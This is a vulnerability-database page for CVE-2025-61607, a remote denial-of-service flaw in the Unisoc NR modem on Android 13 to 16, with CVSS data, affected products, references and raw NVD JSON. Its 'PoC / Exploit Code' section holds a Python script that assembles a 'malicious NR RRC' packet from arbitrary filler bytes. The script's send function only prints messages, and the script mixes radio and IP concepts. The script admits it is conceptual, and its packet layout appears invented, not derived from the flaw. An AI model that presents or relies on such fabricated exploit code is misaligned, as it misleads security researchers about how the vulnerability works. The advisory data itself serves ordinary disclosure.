CVE-2025-61607

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Unisoc NR Modem (版本信息待官方披露)

紫光展锐5G/4G调制解调器芯片 (具体型号待确认)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61607 PoC - Unisoc NR Modem DoS
# Note: This is a conceptual PoC for demonstration purposes
# Actual exploitation requires specialized radio equipment and NR protocol knowledge

import struct

def generate_malicious_nr_packet():
    """
    Generate a malicious NR RRC message that may trigger
    input validation vulnerability in Unisoc NR modem
    """
    # NR RRC Connection Setup message with malformed fields
    packet = bytearray()
    
    # RRC protocol version and message type
    packet.extend([0x00, 0x01])  # Version and Message Type
    
    # Cell Radio Network Temporary Identifier
    packet.extend([0x00, 0x00, 0x00, 0x01])
    
    # Malformed Frequency Domain Resource
    # This may trigger improper input validation
    packet.extend([0xFF, 0xFF, 0xFF, 0xFF])
    
    # Invalid timing advance or other critical parameters
    packet.extend([0x00, 0xFF, 0xFF, 0x00])
    
    # Padding with unexpected values
    packet.extend([0xAB, 0xCD, 0xEF, 0x00] * 10)
    
    return bytes(packet)

def send_to_target(packet, target_ip, port=38472):
    """
    Send malicious packet to target device
    Note: Requires appropriate radio equipment for NR interface
    """
    print(f"[*] Generated malicious NR packet: {len(packet)} bytes")
    print(f"[*] Target: {target_ip}:{port}")
    print("[*] Note: Actual exploitation requires NR-compatible radio equipment")
    # Implementation would use SDR or network interface

if __name__ == "__main__":
    malicious_packet = generate_malicious_nr_packet()
    print("CVE-2025-61607 PoC - Unisoc NR Modem Input Validation Issue")
    print(f"Packet length: {len(malicious_packet)} bytes")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61607/
[4] VulDB https://vuldb.com/cve/CVE-2025-61607
[5] https://www.unisoc.com/en/support/announcement/1995394837938163714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61607", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.140", "lastModified": "2025-12-02T15:53:35.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}